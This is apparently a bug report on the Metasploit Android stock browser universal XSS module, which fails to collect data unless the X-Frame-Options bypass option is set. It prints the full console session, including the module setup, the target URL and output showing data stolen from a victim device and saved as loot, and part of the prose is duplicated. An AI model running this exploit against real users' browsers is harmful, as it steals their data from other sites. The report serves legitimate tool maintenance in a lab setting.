Using the AOSP Browser on Android 4.1.2, I am unable to collect loot from a specified target URL:
msf > use auxiliary/gather/android_stock_browser_uxss
msf auxiliary(android_stock_browser_uxss) > set URIPATH /
URIPATH => /
msf auxiliary(android_stock_browser_uxss) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://clownchat.sec575.org
TARGET_URLS => http://clownchat.sec575.org
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) >
[*] 172.16.0.105 android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105 android_stock_browser_uxss - Request 'GET /'
However, when I set BYPASS_XFO, I do collect the loot from the victim:
msf auxiliary(android_stock_browser_uxss) > kill 0
Stopping job: 0...
msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO True
BYPASS_XFO => True
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) > [*] 172.16.0.105 android_stock_browser_uxss - Request 'GET /'
[*] 172.16.0.105 android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105 android_stock_browser_uxss - Request 'POST /'
[+] Collected data from URL: http://clownchat.sec575.org/activity
[+] Saved to: /root/.msf4/loot/20150116165331_default_172.16.0.105_android.client_243338.txt
In this case, the target server is NOT using X-Frame-Options, and therefore should not require the BYPASS_XFO option (and the awkward popup) for successful exploitation.
Here is a pcap file of the server responses when the BYPASS_XFO option is not set.
Using the AOSP Browser on Android 4.1.2, I am unable to collect loot from a specified target URL:
However, when I set BYPASS_XFO, I do collect the loot from the victim:
In this case, the target server is NOT using X-Frame-Options, and therefore should not require the BYPASS_XFO option (and the awkward popup) for successful exploitation.
Here is a pcap file of the server responses when the BYPASS_XFO option is not set.
https://www.dropbox.com/s/rsz2m2xy6i228b7/android_browser_xss_bypass_xfo_issue.pcap?dl=0
Thanks,
-Josh